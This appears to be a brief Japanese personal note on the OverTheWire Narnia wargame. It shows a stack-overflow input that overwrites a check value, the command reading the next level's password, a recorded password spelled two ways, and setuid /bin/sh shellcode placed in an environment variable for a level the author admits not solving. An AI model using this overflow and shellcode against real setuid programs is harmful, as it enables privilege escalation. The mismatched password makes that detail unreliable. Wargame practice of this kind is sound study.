Narnia
#pwn #over-the-wire
narnia0→1
code:bash
$ (echo -e "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde"; cat) | /narnia/narnia0
...(略)...
cat /etc/narnia_pass/narnia1
efeidieadae
pass: efeidiedae
narnia1→2
環境変数EGGの中身が関数として実行される。
execveを実行するshellcodeを入れても起動するが、stickyビットでついている権限が外れてpassが読めない。
そのためsetuidもついでに実行してユーザーを交代する…らしいが解けません。なんで。
https://www.exploit-db.com/exploits/13333/
code:bash
$ export EGG=$(echo -e "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80")
$ ./narnia1
...